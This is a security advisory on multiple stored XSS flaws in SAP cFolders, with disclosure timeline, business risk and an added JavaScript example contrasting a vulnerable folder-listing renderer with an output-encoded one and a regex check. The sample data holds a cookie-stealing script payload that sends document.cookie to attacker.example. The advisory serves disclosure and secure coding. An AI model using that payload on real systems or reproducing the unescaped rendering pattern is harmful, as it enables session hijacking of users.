[ERPSCAN-09-014] SAP Cfolders Multiple Stored XSS Vulnerabilities

DSECRG Advisories

Application: SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms)
Vendor URL: http://sap.com
Bugs: Multiple Stored XSS
Risk: High
Exploits: YES
Reported: 04.12.2008
Vendor response: 05.12.2008
Vulnerability patched: 15.12.2008
Date of Public Advisory: 21.04.2009
Reference: SAP Security Note 1284360

cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information.
cFolders is part of a suite of applications powered by SAP NetWeaver that integrates project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments.
cFolders is integrated with SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms). Virtual teams can access, view online, subscribe to changes in, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios.

Business Risk
A legitimate user of the SAP cFolders engine (which is part of PLM, CRM and the Portal) can store a malicious script in a shared folder; the script is then executed in the browser of every user who opens that folder, giving the attacker control of that user's session. One possible scenario is a supplier attacking another supplier to gain unauthorized access to the victim's session and to tender documentation containing prices for products or services.
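The following is an added illustration of the bug class described above, not code from this advisory and not SAP's cFolders code. The advisory does not disclose the affected fields, so a folder name rendered in a folder listing is an assumed injection point, and the sample folders and the attacker URL are constructed. It shows the vulnerable pattern (untrusted data concatenated into HTML) beside the hardened form (contextual output encoding), and a crude check a tester can run over rendered output to tell the two apart.

```javascript
// Added example: a minimal model of a stored XSS in a shared-folder listing,
// beside the hardened version. This is not cFolders' actual code; the
// folder-name field is an assumed injection point.

// Constructed sample data: two stored folders, one named by a hostile user.
// The payload breaks out of the title attribute and exfiltrates the
// victim's cookie to an attacker-controlled host (constructed URL).
const SAMPLE_FOLDERS = [
  { id: 1, name: 'Tender 2008 - Supplier A' },
  { id: 2, name: '"><script>document.location="http://attacker.example/?c="+document.cookie</script>' },
];

// Vulnerable: stored folder names are concatenated straight into the HTML
// that every other user who opens the folder listing will receive.
function renderListingVulnerable(folders) {
  return folders
    .map((f) => `<li><a href="/cfolders/folder?id=${f.id}" title="${f.name}">${f.name}</a></li>`)
    .join('\n');
}

// Output encoding for HTML text nodes and double-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is encoded for the context it lands in,
// and the id is coerced to an integer so it cannot break out of the URL.
function renderListingSafe(folders) {
  return folders
    .map((f) => {
      const id = Number.parseInt(f.id, 10);
      if (!Number.isInteger(id)) throw new TypeError('folder id must be an integer');
      const name = escapeHtml(f.name);
      return `<li><a href="/cfolders/folder?id=${id}" title="${name}">${name}</a></li>`;
    })
    .join('\n');
}

// Crude check over rendered markup: does a raw <script tag or an inline
// event-handler attribute survive? A real review parses the DOM; a regex is
// enough to show the difference between the two renderers.
function containsActiveScript(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Stand-alone run: the vulnerable listing carries live script, the safe one
// renders the same folder name as inert text.
console.log('vulnerable:', containsActiveScript(renderListingVulnerable(SAMPLE_FOLDERS)));
console.log('hardened:  ', containsActiveScript(renderListingSafe(SAMPLE_FOLDERS)));
```

The fix is encoding at output time for the exact context (text node, attribute, URL), not input filtering: the same stored name must stay usable as data while never being interpreted as markup in another user's browser.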